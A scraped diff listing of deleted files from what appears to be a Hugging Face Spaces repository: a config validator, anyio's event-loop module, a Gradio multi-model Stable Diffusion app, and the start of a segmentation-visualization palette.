371 |
-
type=str,
|
372 |
-
help="Output directory to save checkpoints and logs.",
|
373 |
-
)
|
374 |
-
    # add argument for whether to only run evaluation
    validator.add_argument(
        "evaluate",
        help="Whether to only evaluate the model. If true, training will not be performed.",
    )
    # add argument for splits used for training, e.g. ["train", "val"]
    validator.add_argument(
        "train_splits",
        type=list,
        help="Splits to use for training.",
    )
    # add argument for splits used for validation, e.g. ["val"]
    validator.add_argument(
        "valid_splits",
        type=list,
        help="Splits to use for validation. If not provided, validation is skipped.",
    )
    # add argument for splits used for testing, e.g. ["test"]
    validator.add_argument(
        "test_splits",
        type=list,
        help="Splits to use for testing. If not provided, testing is skipped.",
    )
    # add argument for number of gradient-accumulation iterations
    validator.add_argument(
        "accum_grad_iters",
        type=int,
        help="Number of iterations to accumulate gradient for.",
    )

    # ====== distributed training ======
    validator.add_argument(
        "device",
        type=str,
        choices=["cpu", "cuda"],
        help="Device to use. Supports 'cuda' or 'cpu' for now.",
    )
    validator.add_argument(
        "world_size",
        type=int,
        help="Number of processes participating in the job.",
    )
    validator.add_argument("dist_url", type=str)
    validator.add_argument("distributed", type=bool)
    # add argument for whether to use a distributed sampler during evaluation
    validator.add_argument(
        "use_dist_eval_sampler",
        type=bool,
        help="Whether to use a distributed sampler during evaluation.",
    )

    # ====== task specific ======
    # generation task specific arguments
    # add argument for maximum length of text output
    validator.add_argument(
        "max_len",
        type=int,
        help="Maximum length of text output.",
    )
    # add argument for minimum length of text output
    validator.add_argument(
        "min_len",
        type=int,
        help="Minimum length of text output.",
    )
    # add argument for number of beams
    validator.add_argument(
        "num_beams",
        type=int,
        help="Number of beams used for beam search.",
    )

    # vqa task specific arguments
    # add argument for number of answer candidates
    validator.add_argument(
        "num_ans_candidates",
        type=int,
        help="""For ALBEF and BLIP, these models first rank answers according to likelihood to select answer candidates.""",
    )
    # add argument for inference method
    validator.add_argument(
        "inference_method",
        type=str,
        choices=["generate", "rank"],
        help="""Inference method to use for question answering. If rank, requires an answer list.""",
    )

    # ====== model specific ======
    validator.add_argument(
        "k_test",
        type=int,
        help="Number of top-k most similar samples from ITC/VTC selection to be tested.",
    )

    return validator
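The snippet above registers configuration keys on a `validator` object defined elsewhere in the file (not shown in this chunk). As a rough, hypothetical analogue, the same generation-task options could be declared with the stdlib `argparse` — the names and defaults below are illustrative, not part of the original file:

```python
import argparse

# hypothetical stand-in for the config validator: same option names as above
parser = argparse.ArgumentParser()
parser.add_argument("--max-len", type=int, default=30, help="Maximum length of text output.")
parser.add_argument("--min-len", type=int, default=1, help="Minimum length of text output.")
parser.add_argument("--num-beams", type=int, default=5, help="Number of beams used for beam search.")

# parse a sample command line; unset options fall back to their defaults
args = parser.parse_args(["--num-beams", "3"])
print(args.num_beams, args.max_len)  # 3 30
```

Unlike `argparse`, the validator in the file only checks keys that appear in a loaded config, but the declaration style is the same.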
spaces/DQChoi/gpt-demo/venv/lib/python3.11/site-packages/anyio/_core/_eventloop.py
DELETED
@@ -1,153 +0,0 @@
from __future__ import annotations

import math
import sys
import threading
from contextlib import contextmanager
from importlib import import_module
from typing import (
    Any,
    Awaitable,
    Callable,
    Generator,
    TypeVar,
)

import sniffio

# This must be updated when new backends are introduced
from ._compat import DeprecatedAwaitableFloat

BACKENDS = "asyncio", "trio"

T_Retval = TypeVar("T_Retval")
threadlocals = threading.local()


def run(
    func: Callable[..., Awaitable[T_Retval]],
    *args: object,
    backend: str = "asyncio",
    backend_options: dict[str, Any] | None = None,
) -> T_Retval:
    """
    Run the given coroutine function in an asynchronous event loop.

    The current thread must not be already running an event loop.

    :param func: a coroutine function
    :param args: positional arguments to ``func``
    :param backend: name of the asynchronous event loop implementation – currently either
        ``asyncio`` or ``trio``
    :param backend_options: keyword arguments to call the backend ``run()`` implementation with
        (documented :ref:`here <backend options>`)
    :return: the return value of the coroutine function
    :raises RuntimeError: if an asynchronous event loop is already running in this thread
    :raises LookupError: if the named backend is not found

    """
    try:
        asynclib_name = sniffio.current_async_library()
    except sniffio.AsyncLibraryNotFoundError:
        pass
    else:
        raise RuntimeError(f"Already running {asynclib_name} in this thread")

    try:
        asynclib = import_module(f"..._backends._{backend}", package=__name__)
    except ImportError as exc:
        raise LookupError(f"No such backend: {backend}") from exc

    token = None
    if sniffio.current_async_library_cvar.get(None) is None:
        # Since we're in control of the event loop, we can cache the name of the async library
        token = sniffio.current_async_library_cvar.set(backend)

    try:
        backend_options = backend_options or {}
        return asynclib.run(func, *args, **backend_options)
    finally:
        if token:
            sniffio.current_async_library_cvar.reset(token)


async def sleep(delay: float) -> None:
    """
    Pause the current task for the specified duration.

    :param delay: the duration, in seconds

    """
    return await get_asynclib().sleep(delay)


async def sleep_forever() -> None:
    """
    Pause the current task until it's cancelled.

    This is a shortcut for ``sleep(math.inf)``.

    .. versionadded:: 3.1

    """
    await sleep(math.inf)


async def sleep_until(deadline: float) -> None:
    """
    Pause the current task until the given time.

    :param deadline: the absolute time to wake up at (according to the internal monotonic clock of
        the event loop)

    .. versionadded:: 3.1

    """
    now = current_time()
    await sleep(max(deadline - now, 0))


def current_time() -> DeprecatedAwaitableFloat:
    """
    Return the current value of the event loop's internal clock.

    :return: the clock value (seconds)

    """
    return DeprecatedAwaitableFloat(get_asynclib().current_time(), current_time)


def get_all_backends() -> tuple[str, ...]:
    """Return a tuple of the names of all built-in backends."""
    return BACKENDS


def get_cancelled_exc_class() -> type[BaseException]:
    """Return the current async library's cancellation exception class."""
    return get_asynclib().CancelledError


#
# Private API
#


@contextmanager
def claim_worker_thread(backend: str) -> Generator[Any, None, None]:
    module = sys.modules["anyio._backends._" + backend]
    threadlocals.current_async_module = module
    try:
        yield
    finally:
        del threadlocals.current_async_module


def get_asynclib(asynclib_name: str | None = None) -> Any:
    if asynclib_name is None:
        asynclib_name = sniffio.current_async_library()

    modulename = "anyio._backends._" + asynclib_name
    try:
        return sys.modules[modulename]
    except KeyError:
        return import_module(modulename)
spaces/Dagfinn1962/stablediffusion-articlera/index.html
DELETED
@@ -1,271 +0,0 @@
import gradio as gr
import os
import sys
from pathlib import Path

models = [
    {"name": "Deliberate", "url": "Masagin/Deliberate"},
    {"name": "Dreamlike Anime", "url": "dreamlike-art/dreamlike-anime-1.0"},
    {"name": "Dreamlike Diffusion", "url": "dreamlike-art/dreamlike-diffusion-1.0"},
    {"name": "Dreamlike Photoreal", "url": "dreamlike-art/dreamlike-photoreal-2.0"},
    {"name": "Dreamshaper", "url": "Lykon/DreamShaper"},

    {"name": "Never Ending Dream 2", "url": "luongphamit/NeverEnding-Dream2"},
    {"name": "Protogen X 5.8", "url": "darkstorm2150/Protogen_x5.8_Official_Release"},
    {"name": "❤ ART MODELS ==========", "url": "dreamlike-art/dreamlike-diffusion-1.0"},
    {"name": "Alice in Diffusion Land", "url": "Guizmus/SDArt_AliceInDiffusionLand"},
    {"name": "Alt Clip", "url": "BAAI/AltCLIP"},
    {"name": "Anything Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"},
    {"name": "Chaos and Order", "url": "Guizmus/SDArt_ChaosAndOrder768"},
    {"name": "Chilloutclara", "url": "Fred99774/chilloutvlara"},
    {"name": "Comic Diffusion", "url": "ogkalu/Comic-Diffusion"},
    {"name": "Cosmic Horros 768", "url": "Guizmus/SDArt_cosmichorrors768"},
    {"name": "Cosmic Horros", "url": "Guizmus/SDArt_cosmichorrors"},
    {"name": "DGSpitzer", "url": "DGSpitzer/DGSpitzer-Art-Diffusion"},
    {"name": "Dungeons and Diffusion", "url": "0xJustin/Dungeons-and-Diffusion"},
    {"name": "Elden Ring", "url": "nitrosocke/elden-ring-diffusion"},
    {"name": "Epic Diffusion 1.1", "url": "johnslegers/epic-diffusion-v1.1"},
    {"name": "Epic Diffusion", "url": "johnslegers/epic-diffusion"},
    {"name": "EpicMix Realism", "url": "Duskfallcrew/EpicMix_Realism"},
    {"name": "Fantasy Mix", "url": "theintuitiveye/FantasyMix"},
    {"name": "Girl New 1", "url": "Fred99774/girlnew1"},
    {"name": "Lit 6B", "url": "hakurei/lit-6B"},
    {"name": "Luna Diffusion", "url": "proximasanfinetuning/luna-diffusion"},
    {"name": "Midjourney 4.0", "url": "flax/midjourney-v4-diffusion"},
    {"name": "Midjourney 4.1", "url": "Joeythemonster/anything-midjourney-v-4-1"},
    {"name": "Mo-Di Diffusion", "url": "nitrosocke/mo-di-diffusion"},
    {"name": "Nitro Diffusion", "url": "nitrosocke/Nitro-Diffusion"},
    {"name": "Openjourney V2", "url": "prompthero/openjourney-v2"},
    {"name": "Openjourney", "url": "prompthero/openjourney"},
    {"name": "Seek Art Mega", "url": "coreco/seek.art_MEGA"},
    {"name": "Something", "url": "Guizmus/SDArt_something"},
    {"name": "Spider Verse diffusion", "url": "nitrosocke/spider-verse-diffusion"},
    {"name": "Vintedois 1.0", "url": "22h/vintedois-diffusion-v0-1"},
    {"name": "Vintedois 2.0", "url": "22h/vintedois-diffusion-v0-2"},
    {"name": "❤ ART STYLES ==========", "url": "joachimsallstrom/Double-Exposure-Diffusion"},
    {"name": "Balloon Art", "url": "Fictiverse/Stable_Diffusion_BalloonArt_Model"},
    {"name": "Double Exposure Diffusion", "url": "joachimsallstrom/Double-Exposure-Diffusion"},
    {"name": "Fluid Art", "url": "Fictiverse/Stable_Diffusion_FluidArt_Model"},
    {"name": "GTA5 Artwork Diffusion", "url": "ItsJayQz/GTA5_Artwork_Diffusion"},
    {"name": "Marvel WhatIf Diffusion", "url": "ItsJayQz/Marvel_WhatIf_Diffusion"},
    {"name": "Naruto Diffuser", "url": "lambdalabs/sd-naruto-diffusers"},
    {"name": "Papercut", "url": "Fictiverse/Stable_Diffusion_PaperCut_Model"},
    {"name": "Pokemon Diffuser", "url": "lambdalabs/sd-pokemon-diffusers"},
    {"name": "Synthwave Punk 2", "url": "ItsJayQz/SynthwavePunk-v2"},
    {"name": "Valorant Diffusion", "url": "ItsJayQz/Valorant_Diffusion"},
    {"name": "Van Gogh Diffusion", "url": "dallinmackay/Van-Gogh-diffusion"},
    {"name": "Vectorartz Diffusion", "url": "coder119/Vectorartz_Diffusion"},
    {"name": "VoxelArt", "url": "Fictiverse/Stable_Diffusion_VoxelArt_Model"},
    {"name": "❤ ANIME MODELS ==========", "url": "dreamlike-art/dreamlike-anime-1.0"},
    {"name": "7 Pa", "url": "AIARTCHAN/7pa"},
    {"name": "A Certain Model", "url": "JosephusCheung/ACertainModel"},
    {"name": "A Certain Thing", "url": "JosephusCheung/ACertainThing"},
    {"name": "A Certainity", "url": "JosephusCheung/ACertainty"},
    {"name": "Abyss Hell Hero", "url": "AIARTCHAN/AbyssHellHero"},
    {"name": "Abyss Maple 3", "url": "AIARTCHAN/AbyssMapleVer3"},
    {"name": "Abyss Orange Mix 2", "url": "WarriorMama777/AbyssOrangeMix2"},
    {"name": "Abyss Orange Mix", "url": "WarriorMama777/AbyssOrangeMix"},
    {"name": "AbyssHell 3", "url": "AIARTCHAN/AbyssHellVer3"},
    {"name": "All 526 Animated", "url": "stablediffusionapi/all-526-animated"},
    {"name": "Anidosmix 3", "url": "AIARTCHAN/anidosmixV2"},
    {"name": "Anime Kawai Diffusion", "url": "Ojimi/anime-kawai-diffusion"},
    {"name": "Anireal 3D V2", "url": "circulus/sd-anireal-3d-v2"},
    {"name": "AnyLORA", "url": "kubanemil/AnyLORA"},
    {"name": "Anything 2.1", "url": "swl-models/anything-v2.1"},
    {"name": "Anything 3.0 Light", "url": "mm00/anything-v3.0-light"},
    {"name": "Anything 3.0", "url": "Linaqruf/anything-v3.0"},
    {"name": "Anything 3.1", "url": "cag/anything-v3-1"},
    {"name": "Anything 3X", "url": "iZELX1/Anything-V3-X"},
    {"name": "Anything 5.0", "url": "stablediffusionapi/anything-v5"},
    {"name": "Anything Else 4", "url": "stablediffusionapi/anythingelse-v4"},
    {"name": "Anything Else 5", "url": "stablediffusionapi/anything-v5"},
    {"name": "Arcane Diffusion", "url": "nitrosocke/Arcane-Diffusion"},
    {"name": "Archer Diffusion", "url": "nitrosocke/archer-diffusion"},
    {"name": "Asian Mix", "url": "D1b4l4p/AsianMix"},
    {"name": "Blood Orange Mix", "url": "WarriorMama777/BloodOrangeMix"},
    {"name": "CamelliaMix 2.5D", "url": "stablediffusionapi/camelliamix25d"},
    {"name": "CamelliaMix Line", "url": "stablediffusionapi/camelliamixline"},
    {"name": "Cetusmix", "url": "stablediffusionapi/cetusmix"},
    {"name": "Chik Mix", "url": "stablediffusionapi/chikmix"},
    {"name": "Chikmix", "url": "stablediffusionapi/chikmix"},
    {"name": "Chillout App Factory", "url": "stablediffusionapi/chillout-app-factory"},
    {"name": "Classic Anime", "url": "nitrosocke/classic-anim-diffusion"},
    {"name": "Cool Japan Diffusion 2.1.2", "url": "aipicasso/cool-japan-diffusion-2-1-2"},
    {"name": "Cosmic Babes", "url": "stablediffusionapi/cosmic-babes"},
    {"name": "Counterfeit 1.0", "url": "gsdf/counterfeit-v1.0"},
    {"name": "Counterfeit 2", "url": "gsdf/Counterfeit-V2.0"},
    {"name": "Counterfeit 2.0", "url": "gsdf/Counterfeit-V2.0"},
    {"name": "Counterfeit 3.0", "url": "stablediffusionapi/counterfeit-v30"},
    {"name": "CyberPunk Anime", "url": "DGSpitzer/Cyberpunk-Anime-Diffusion"},
    {"name": "Dark Sushi Mix", "url": "stablediffusionapi/dark-sushi-mix"},
    {"name": "Dash Sushi 25d", "url": "stablediffusionapi/dark-sushi-25d"},
    {"name": "DucHaiten Anime", "url": "DucHaiten/DucHaitenAnime"},
    {"name": "Eerie Orange Mix", "url": "WarriorMama777/EerieOrangeMix"},
    {"name": "Eimis Anime Diffusion", "url": "eimiss/EimisAnimeDiffusion_1.0v"},
    {"name": "Ghibli Diffusion", "url": "nitrosocke/Ghibli-Diffusion"},
    {"name": "GrapeFruit", "url": "iZELX1/Grapefruit"},
    {"name": "GuoFeng 3", "url": "xiaolxl/GuoFeng3"},
    {"name": "Icomix 2", "url": "stablediffusionapi/icomix-2"},
    {"name": "InkPunk Diffusion", "url": "Envvi/Inkpunk-Diffusion"},
    {"name": "Mama Orange Mixs", "url": "WarriorMama777/OrangeMixs"},
    {"name": "Mashuu Diffusion", "url": "andite/mashuu-diffusion"},
    {"name": "Openjourney 4", "url": "prompthero/openjourney-v4"},
    {"name": "OpenNiji", "url": "Korakoe/OpenNiji"},
    {"name": "Pastel Mix", "url": "andite/pastel-mix"},
    {"name": "Picasso Diffusion 1.1", "url": "aipicasso/picasso-diffusion-1-1"},
    {"name": "Piromizu Diffusion", "url": "andite/piromizu-diffusion"},
    {"name": "Protogen 2.2", "url": "darkstorm2150/Protogen_v2.2_Official_Release"},
    {"name": "Protogen Infinity", "url": "darkstorm2150/Protogen_Infinity_Official_Release"},
    {"name": "Protogen X 3.4", "url": "darkstorm2150/Protogen_x3.4_Official_Release"},
    {"name": "Rev Anim", "url": "stablediffusionapi/rev-anim"},
    {"name": "Rev Animated", "url": "coreml/coreml-ReV-Animated"},
    {"name": "Rev Animated", "url": "LottePeisch/RevAnimated-Diffusers"},
    {"name": "Something V 2.2", "url": "NoCrypt/SomethingV2_2"},
    {"name": "Something V2", "url": "NoCrypt/SomethingV2"},
    {"name": "Three Delicacy", "url": "stablediffusionapi/three-delicacy"},
    {"name": "Three Delicacy wonto", "url": "stablediffusionapi/three-delicacy-wonto"},
    {"name": "TMND mix", "url": "stablediffusionapi/tmnd-mix"},
    {"name": "Waifu Diffusion", "url": "hakurei/waifu-diffusion"},
    {"name": "❤ REALISTIC PHOTO MODELS ==========", "url": "dreamlike-art/dreamlike-photoreal-2.0"},
    {"name": "AmiIReal", "url": "stablediffusionapi/amireal"},
    {"name": "Analog Diffusion", "url": "wavymulder/Analog-Diffusion"},
    {"name": "Circulus 2.8", "url": "circulus/sd-photoreal-v2.8"},
    {"name": "UltraSkin", "url": "VegaKH/Ultraskin"},
    {"name": "Wavyfusion", "url": "wavymulder/wavyfusion"},
    {"name": "❤ SEMI-REALISTIC MODELS ==========", "url": "stablediffusionapi/all-526"},
    {"name": "All 526", "url": "stablediffusionapi/all-526"},
    {"name": "All 526 animated", "url": "stablediffusionapi/all-526-animated"},
    {"name": "Circulus Semi Real 2", "url": "circulus/sd-photoreal-semi-v2"},
    {"name": "Semi Real Mix", "url": "robotjung/SemiRealMix"},
    {"name": "SpyBG", "url": "stablediffusionapi/spybg"},
    {"name": "❤ STABLE DIFFUSION MODELS ==========", "url": "stabilityai/stable-diffusion-2-1"},
    {"name": "Stable Diffusion 1.4", "url": "CompVis/stable-diffusion-v1-4"},
    {"name": "Stable Diffusion 1.5", "url": "runwayml/stable-diffusion-v1-5"},
    {"name": "Stable Diffusion 2.1", "url": "stabilityai/stable-diffusion-2-1"},
    {"name": "Stable Diffusion 2.1 Base", "url": "stabilityai/stable-diffusion-2-1-base"},
    {"name": "Stable Diffusion 2.1 Unclip", "url": "stabilityai/stable-diffusion-2-1-unclip"},
    {"name": "❤ SCI FI MODELS ==========", "url": "nitrosocke/Future-Diffusion"},
    {"name": "Future Diffusion", "url": "nitrosocke/Future-Diffusion"},
    {"name": "JWST Deep Space Diffusion", "url": "dallinmackay/JWST-Deep-Space-diffusion"},
    {"name": "Robo Diffusion 3 Base", "url": "nousr/robo-diffusion-2-base"},
    {"name": "Robo Diffusion", "url": "nousr/robo-diffusion"},
    {"name": "Tron Legacy Diffusion", "url": "dallinmackay/Tron-Legacy-diffusion"},
    {"name": "❤ 3D ART MODELS ==========", "url": "DucHaiten/DucHaitenAIart"},
    {"name": "DucHaiten Art", "url": "DucHaiten/DucHaitenAIart"},
    {"name": "DucHaiten ClassicAnime", "url": "DucHaiten/DH_ClassicAnime"},
    {"name": "DucHaiten DreamWorld", "url": "DucHaiten/DucHaitenDreamWorld"},
    {"name": "DucHaiten Journey", "url": "DucHaiten/DucHaitenJourney"},
    {"name": "DucHaiten StyleLikeMe", "url": "DucHaiten/DucHaiten-StyleLikeMe"},
    {"name": "DucHaiten SuperCute", "url": "DucHaiten/DucHaitenSuperCute"},
    {"name": "Redshift Diffusion 768", "url": "nitrosocke/redshift-diffusion-768"},
    {"name": "Redshift Diffusion", "url": "nitrosocke/redshift-diffusion"},
]

current_model = models[0]

text_gen = gr.Interface.load("spaces/Omnibus/MagicPrompt-Stable-Diffusion_link")

models2 = []
for model in models:
    model_url = f"models/{model['url']}"
    loaded_model = gr.Interface.load(model_url, live=True, preprocess=True)
    models2.append(loaded_model)


def text_it(inputs, text_gen=text_gen):
    return text_gen(inputs)


def set_model(current_model_index):
    global current_model
    current_model = models[current_model_index]
    # eight image outputs are wired to this callback, so return one update per output
    return [gr.update(label=f"{current_model['name']}") for _ in range(8)]


def send_it(inputs, model_choice):
    proc = models2[model_choice]
    return proc(inputs)


css = """"""

with gr.Blocks(css=css) as myface:
    gr.HTML(
        """<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8" />
<meta name="twitter:card" content="player"/>
<meta name="twitter:site" content="Free Stable-Diffusion"/>
<meta name="twitter:player" content="https://omnibus-maximum-multiplier-places.hf.space"/>
<meta name="twitter:player:stream" content="https://omnibus-maximum-multiplier-places.hf.space"/>
<meta name="twitter:player:width" content="100%"/>
<meta name="twitter:player:height" content="600"/>
<meta property="og:title" content="Embedded Live Viewer"/>
<meta property="og:description" content="Tweet Genie - A Huggingface Space"/>
<meta property="og:image" content="https://cdn.glitch.global/80dbe92e-ce75-44af-84d5-74a2e21e9e55/omnicard.png?v=1676772531627"/>
<!--<meta http-equiv="refresh" content="0; url=https://huggingface.co/spaces/corbt/tweet-genie">-->
</head>
</html>
"""
    )

    with gr.Row():
        with gr.Row():
            input_text = gr.Textbox(label="Prompt idea", lines=1)
            # Model selection dropdown
            model_name1 = gr.Dropdown(
                label="Choose Model",
                choices=[m["name"] for m in models],
                type="index",
                value=current_model["name"],
                interactive=True,
            )
        with gr.Row():
            see_prompts = gr.Button("Generate Prompts")
            run = gr.Button("Generate Images", variant="primary")
    with gr.Tab("Main"):
        with gr.Row():
            output1 = gr.Image(label=f"{current_model['name']}")
            output2 = gr.Image(label=f"{current_model['name']}")
            output3 = gr.Image(label=f"{current_model['name']}")
            output4 = gr.Image(label=f"{current_model['name']}")
        with gr.Row():
            magic1 = gr.Textbox(lines=4)
            magic2 = gr.Textbox(lines=4)
            magic3 = gr.Textbox(lines=4)
            magic4 = gr.Textbox(lines=4)

        with gr.Row():
            output5 = gr.Image(label=f"{current_model['name']}")
            output6 = gr.Image(label=f"{current_model['name']}")
            output7 = gr.Image(label=f"{current_model['name']}")
            output8 = gr.Image(label=f"{current_model['name']}")
        with gr.Row():
            magic5 = gr.Textbox(lines=4)
            magic6 = gr.Textbox(lines=4)
            magic7 = gr.Textbox(lines=4)
            magic8 = gr.Textbox(lines=4)

    model_name1.change(set_model, inputs=model_name1, outputs=[output1, output2, output3, output4, output5, output6, output7, output8])

    run.click(send_it, inputs=[magic1, model_name1], outputs=[output1])
    run.click(send_it, inputs=[magic2, model_name1], outputs=[output2])
    run.click(send_it, inputs=[magic3, model_name1], outputs=[output3])
    run.click(send_it, inputs=[magic4, model_name1], outputs=[output4])
    run.click(send_it, inputs=[magic5, model_name1], outputs=[output5])
    run.click(send_it, inputs=[magic6, model_name1], outputs=[output6])
    run.click(send_it, inputs=[magic7, model_name1], outputs=[output7])
    run.click(send_it, inputs=[magic8, model_name1], outputs=[output8])

    see_prompts.click(text_it, inputs=[input_text], outputs=[magic1])
    see_prompts.click(text_it, inputs=[input_text], outputs=[magic2])
    see_prompts.click(text_it, inputs=[input_text], outputs=[magic3])
    see_prompts.click(text_it, inputs=[input_text], outputs=[magic4])
    see_prompts.click(text_it, inputs=[input_text], outputs=[magic5])
    see_prompts.click(text_it, inputs=[input_text], outputs=[magic6])
    see_prompts.click(text_it, inputs=[input_text], outputs=[magic7])
    see_prompts.click(text_it, inputs=[input_text], outputs=[magic8])

myface.queue(concurrency_count=200)
myface.launch(inline=True, show_api=False, max_threads=400)
spaces/Dinoking/Guccio-AI-Designer/netdissect/segviz.py
DELETED
@@ -1,283 +0,0 @@
import numpy, scipy

def segment_visualization(seg, size):
    result = numpy.zeros((seg.shape[1] * seg.shape[2], 3), dtype=numpy.uint8)
    flatseg = seg.reshape(seg.shape[0], seg.shape[1] * seg.shape[2])
    bc = numpy.bincount(flatseg.flatten())
    top = numpy.argsort(-bc)
    # In a multilabel segmentation, we can't draw everything.
    # Draw the fewest-pixel labels last. (We could pick the opposite order.)
    for label in top:
        if label == 0:
            continue
        if bc[label] == 0:
            break
        bitmap = ((flatseg == label).sum(axis=0) > 0)
        result[bitmap] = high_contrast_arr[label % len(high_contrast_arr)]
    result = result.reshape((seg.shape[1], seg.shape[2], 3))
    if seg.shape[1:] != size:
        result = scipy.misc.imresize(result, size, interp='nearest')
    return result

# A palette that maximizes perceptual contrast between entries.
# https://stackoverflow.com/questions/33295120
high_contrast = [
    [0, 0, 0], [255, 255, 0], [28, 230, 255], [255, 52, 255],
    [255, 74, 70], [0, 137, 65], [0, 111, 166], [163, 0, 89],
    [255, 219, 229], [122, 73, 0], [0, 0, 166], [99, 255, 172],
    [183, 151, 98], [0, 77, 67], [143, 176, 255], [153, 125, 135],
    [90, 0, 7], [128, 150, 147], [254, 255, 230], [27, 68, 0],
    [79, 198, 1], [59, 93, 255], [74, 59, 83], [255, 47, 128],
    [97, 97, 90], [186, 9, 0], [107, 121, 0], [0, 194, 160],
    [255, 170, 146], [255, 144, 201], [185, 3, 170], [209, 97, 0],
    [221, 239, 255], [0, 0, 53], [123, 79, 75], [161, 194, 153],
    [48, 0, 24], [10, 166, 216], [1, 51, 73], [0, 132, 111],
    [55, 33, 1], [255, 181, 0], [194, 255, 237], [160, 121, 191],
    [204, 7, 68], [192, 185, 178], [194, 255, 153], [0, 30, 9],
    [0, 72, 156], [111, 0, 98], [12, 189, 102], [238, 195, 255],
    [69, 109, 117], [183, 123, 104], [122, 135, 161], [120, 141, 102],
    [136, 85, 120], [250, 208, 159], [255, 138, 154], [209, 87, 160],
    [190, 196, 89], [69, 102, 72], [0, 134, 237], [136, 111, 76],
    [52, 54, 45], [180, 168, 189], [0, 166, 170], [69, 44, 44],
    [99, 99, 117], [163, 200, 201], [255, 145, 63], [147, 138, 129],
    [87, 83, 41], [0, 254, 207], [176, 91, 111], [140, 208, 255],
    [59, 151, 0], [4, 247, 87], [200, 161, 161], [30, 110, 0],
    [121, 0, 215], [167, 117, 0], [99, 103, 169], [160, 88, 55],
    [107, 0, 44], [119, 38, 0], [215, 144, 255], [155, 151, 0],
    [84, 158, 121], [255, 246, 159], [32, 22, 37], [114, 65, 143],
    [188, 35, 255], [153, 173, 192], [58, 36, 101], [146, 35, 41],
    [91, 69, 52], [253, 232, 220], [64, 78, 85], [0, 137, 163],
    [203, 126, 152], [164, 232, 4], [50, 78, 114], [106, 58, 76],
    [131, 171, 88], [0, 28, 30], [209, 247, 206], [0, 75, 40],
    [200, 208, 246], [163, 164, 137], [128, 108, 102], [34, 40, 0],
    [191, 86, 80], [232, 48, 0], [102, 121, 109], [218, 0, 124],
    [255, 26, 89], [138, 219, 180], [30, 2, 0], [91, 78, 81],
    [200, 149, 197], [50, 0, 51], [255, 104, 50], [102, 225, 211],
    [207, 205, 172], [208, 172, 148], [126, 211, 121], [1, 44, 88],
    [122, 123, 255], [214, 142, 1], [53, 51, 57], [120, 175, 161],
    [254, 178, 198], [117, 121, 124], [131, 115, 147], [148, 58, 77],
    [181, 244, 255], [210, 220, 213], [149, 86, 189], [106, 113, 74],
    [0, 19, 37], [2, 82, 95], [10, 163, 247], [233, 129, 118],
    [219, 213, 221], [94, 188, 209], [61, 79, 68], [126, 100, 5],
    [2, 104, 78], [150, 43, 117], [141, 133, 70], [150, 149, 197],
    [231, 115, 206], [216, 106, 120], [62, 137, 190], [202, 131, 78],
    [81, 138, 135], [91, 17, 60], [85, 129, 59], [231, 4, 196],
    [0, 0, 95], [169, 115, 153], [75, 129, 96], [89, 115, 138],
    [255, 93, 167], [247, 201, 191], [100, 49, 39], [81, 58, 1],
    [107, 148, 170], [81, 160, 88], [164, 91, 2], [29, 23, 2],
    [226, 0, 39], [231, 171, 99], [76, 96, 1], [156, 105, 102],
    [100, 84, 123], [151, 151, 158], [0, 106, 102], [57, 20, 6],
    [244, 215, 73], [0, 69, 210], [0, 108, 49], [221, 182, 208],
    [124, 101, 113], [159, 178, 164], [0, 216, 145], [21, 160, 138],
    [188, 101, 233], [255, 255, 254], [198, 220, 153], [32, 59, 60],
    [103, 17, 144], [107, 58, 100], [245, 225, 255], [255, 160, 242],
    [204, 170, 53], [55, 69, 39], [139, 180, 0], [121, 120, 104],
    [198, 0, 90], [59, 0, 10], [200, 98, 64], [41, 96, 124],
    [64, 35, 52], [125, 90, 68], [204, 184, 124], [184, 129, 131],
    [170, 81, 153], [181, 214, 195], [163, 132, 105], [159, 148, 240],
    [167, 69, 113], [184, 148, 166], [113, 187, 140], [0, 180, 51],
    [120, 158, 201], [109, 128, 186], [149, 63, 0], [94, 255, 3],
    [228, 255, 252], [27, 225, 119], [188, 177, 229], [118, 145, 47],
    [0, 49, 9], [0, 96, 205], [210, 0, 150], [137, 85, 99],
    [41, 32, 29], [91, 50, 19], [167, 111, 66], [137, 65, 46],
    [26, 58, 42], [73, 75, 90], [168, 140, 133], [244, 171, 170],
    [163, 243, 171], [0, 198, 200], [234, 139, 102], [149, 138, 159],
    [189, 201, 210], [159, 160, 100], [190, 71, 0], [101, 129, 136],
    [131, 164, 133], [69, 60, 35], [71, 103, 93], [58, 63, 0],
    [6, 18, 3], [223, 251, 113], [134, 142, 126], [152, 208, 88],
    [108, 143, 125], [215, 191, 194], [60, 62, 110], [216, 61, 102],
    [47, 93, 155], [108, 94, 70], [210, 91, 136], [91, 101, 108],
    [0, 181, 127], [84, 92, 70], [134, 96, 151], [54, 93, 37],
    [37, 47, 153], [0, 204, 255], [103, 78, 96], [252, 0, 156],
    [146, 137, 107], [30, 35, 36], [222, 201, 178], [157, 73, 72],
    [133, 171, 180], [52, 33, 66], [208, 150, 133], [164, 172, 172],
    [0, 255, 255], [174, 156, 134], [116, 42, 51], [14, 114, 197],
    [175, 216, 236], [192, 100, 185], [145, 2, 140], [254, 237, 191],
    [255, 183, 137], [156, 184, 228], [175, 255, 209], [42, 54, 76],
    [79, 74, 67], [100, 112, 149], [52, 187, 255], [128, 119, 129],
    [146, 0, 3], [179, 165, 167], [1, 134, 21], [241, 255, 200],
    [151, 111, 92], [255, 59, 193], [255, 95, 107], [7, 125, 132],
    [245, 109, 147], [87, 113, 218], [78, 30, 42], [131, 0, 85],
|
101 |
-
[2, 211, 70], [190, 69, 45], [0, 144, 94], [190, 0, 40],
|
102 |
-
[110, 150, 227], [0, 118, 153], [254, 201, 109], [156, 106, 125],
|
103 |
-
[63, 161, 184], [137, 61, 227], [121, 180, 214], [127, 212, 217],
|
104 |
-
[103, 81, 187], [178, 141, 45], [226, 122, 5], [221, 156, 184],
|
105 |
-
[170, 188, 122], [152, 0, 52], [86, 26, 2], [143, 127, 0],
|
106 |
-
[99, 80, 0], [205, 125, 174], [138, 94, 45], [255, 179, 225],
|
107 |
-
[107, 100, 102], [198, 211, 0], [1, 0, 226], [136, 236, 105],
|
108 |
-
[143, 204, 190], [33, 0, 28], [81, 31, 77], [227, 246, 227],
|
109 |
-
[255, 142, 177], [107, 79, 41], [163, 127, 70], [106, 89, 80],
|
110 |
-
[31, 42, 26], [4, 120, 77], [16, 24, 53], [230, 224, 208],
|
111 |
-
[255, 116, 254], [0, 164, 95], [143, 93, 248], [75, 0, 89],
|
112 |
-
[65, 47, 35], [216, 147, 158], [219, 157, 114], [96, 65, 67],
|
113 |
-
